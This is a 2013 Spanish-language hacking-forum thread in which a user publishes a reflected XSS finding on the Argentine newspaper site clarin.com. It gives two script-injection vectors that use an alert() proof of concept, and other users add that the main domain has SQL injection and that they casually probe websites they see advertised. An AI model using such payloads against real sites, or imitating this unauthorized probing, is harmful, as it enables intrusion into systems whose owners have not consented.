comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS Reflected clarin.com (El diario mas polemico de la argentina)

  • 8 Respuestas
  • 2722 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    1.67%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« en: Febrero 01, 2013, 12:07:04 am »



Url del sitio: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Vectores:
- No tienes permisos para ver links. Registrate o Entra con tu cuenta"><script>alert(/XSS/)</script>
- No tienes permisos para ver links. Registrate o Entra con tu cuenta"><script>alert(/XSS/)</script>&to=01/02/2013

Autor: [Q]3rV[0]

Reportado: SI
« Última modificación: Enero 10, 2015, 12:52:40 pm por Expermicid »
Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #1 en: Febrero 01, 2013, 12:12:52 am »
Hijo de su madre Clarin, el otro dia busque ahí y no encontré xD
Saludos,, Cronos.-

Desconectado Expermicid

  • *
  • Underc0der
  • Mensajes: 457
  • Actividad:
    0%
  • Reputación 0
  • _-Expermicid-_
    • Ver Perfil
  • Skype: expermicid.xd
« Respuesta #2 en: Febrero 01, 2013, 12:13:34 am »
xD muy bueno [Q]3rV[0].

Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD

Saludos

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    1.67%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #3 en: Febrero 01, 2013, 12:16:38 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
xD muy bueno [Q]3rV[0].

Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD

Saludos

jaja a mi me pasa igual, que cuando veo una propaganda y pasan la web, enseguida me pongo a buscar algun fallo en esa web
Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #4 en: Febrero 01, 2013, 12:50:17 am »
jajaja muy bueno! te felicito!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #5 en: Febrero 01, 2013, 01:31:56 am »
También tiene SQL pero en el dominio principal.

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 850
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #6 en: Febrero 01, 2013, 12:35:00 pm »
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #7 en: Febrero 02, 2013, 02:50:31 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 850
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #8 en: Febrero 02, 2013, 03:01:40 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL

es un decir, porque ilustrame como llamarías a la accion de realizar un xss en la pagina de clarin?

lo unico que se me ocurre es decirle

Citar
felicidades ahora eres partidario del gobierno, explotando vulnerabilidades en páginas de clarin jajajaj

cosa que en ese momento no se me ocurrió.

de todos modos cito la definición de wikipedia

Citar
Defacement es una palabra inglesa que significa desfiguración y es un término usado en informática para hacer referencia a la deformación o cambio producido de manera intencionada en una página web por un atacante que haya obtenido algún tipo de acceso a ella, bien por algún error de programación de la página, por algún bug en el propio servidor o por una mala administración de este. El autor de un defacement se denomina defacer.

esta definición nos ilustra, comentandonos que defacement se le podría llamar a una deformación en el sitio web, originalmente la idea del programador de clarin no era que muestre ese mensaje, entonces es una deformación, por más que sea reflejado, sigue siendo una deformación por tanto según wikipedia un deface.

No tienes permisos para ver links. Registrate o Entra con tu cuenta

saludos!
« Última modificación: Febrero 02, 2013, 03:12:58 pm por [H]arkonnen »

 

¿Te gustó el post? COMPARTILO!



XSS Reflected Error Based "Aerolineas Argentinas"

Iniciado por q3rv0

Respuestas: 3
Vistas: 2457
Último mensaje Septiembre 02, 2012, 04:46:33 pm
por ANTRAX
SQLI Direccion de Bienestar Fuerza Aerea Argentina

Iniciado por hdbreaker

Respuestas: 4
Vistas: 2008
Último mensaje Noviembre 26, 2012, 12:05:50 pm
por alexander1712
XSS Tv Publica argentina

Iniciado por trackerkey

Respuestas: 2
Vistas: 1301
Último mensaje Enero 31, 2013, 01:32:39 am
por trackerkey
XSS Napsix Argentina

Iniciado por hdbreaker

Respuestas: 0
Vistas: 1552
Último mensaje Agosto 27, 2012, 06:50:33 pm
por hdbreaker
XSS Reflected Quicksilver Brasil

Iniciado por q3rv0

Respuestas: 0
Vistas: 1627
Último mensaje Septiembre 09, 2012, 02:11:37 am
por q3rv0